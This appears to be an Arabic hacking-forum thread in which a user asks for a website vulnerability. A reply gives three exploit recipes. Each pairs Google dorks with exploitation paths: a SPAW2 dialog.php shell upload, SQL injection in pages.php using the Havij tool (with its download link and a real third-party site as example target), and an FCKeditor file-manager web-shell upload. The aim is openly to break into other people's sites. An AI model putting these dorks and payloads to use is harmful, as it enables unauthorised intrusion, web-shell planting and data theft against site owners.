ممكن ثغرة لاخراق مواقع ??

مو فاهمة عليك .. يعني ممكن احد يعطيك ثغرة بس ماتكون بالموقع اللي انت مستهدفه .. انت الموقع اللي تبي تخترقه تبحث فيه ع ثغرات

بس كيف ابحث عن الثغرة ??

ادخل علي قسم الثغرات وراح تلقي كل اللي تبغاه

الثغرة الاولا رفع شيل :-

دورك البحث google


'?spaw2/dialog.php'


الإستغلال



?module=spawfm&dialog=spawfm&theme=spaw2&lang=sr&c harset=utf- 8&scid=7c78b510c597c41cbd6c469&type=imagesundefi ne


الثغرة الثانية : -

نوع الثغرة : S Q L
الملف المصاب :. pages.php
دورك البحث بقوقل : Powered By ebda3-eg.com
================================================== ==
الاستغلال ببرنامج الهافج أو الحقن اليدوي أو إي برنامج يحقن

تحميل برنامج الهافج :.

http://itsecteam.com/files/havij/Havij1.15Free.rar

البرنامج من موقعه الرسمي يمكنك البحث عن شروحات له


رابط أستغلال الملف يكون كذا
http://xxxxxxx.com/&&&&/pages.php?ids=23%22

حلو xxxxxx رابط الموقع
&&&& مسار السكربت
الملف والداله pages.php?ids=23%22

يصير الاستغلال كذا

http://waterworld-media.com/ncrp/pages.php?ids=23

الموقع أشتغل ما فيه شي نشوف مصاب او لا

نضع أمامه " أو < أو + أو ، أو الخ ....
راح يطلع لك كذا

الثغرة الثالثة برايفت : -

[ سكربت آجنبي ]

موقع آلسكربت آلرسمي :

http://www.ecshop.com/

?آلثغره بجميع آصدآر آلشركة

دورك خطير من عملي (راكان)

الدورك : inurl:includes/fckeditor/editor

---

آستغلآل عن آلثغره ..

localhost/path/includes/fckeditor/editor/filemanager/browser/default/frmupload.html

رفع آلشل رآح يكون بصيغ آلتآليه
Jpg * html * Phtml

بتوفيق حبيبي .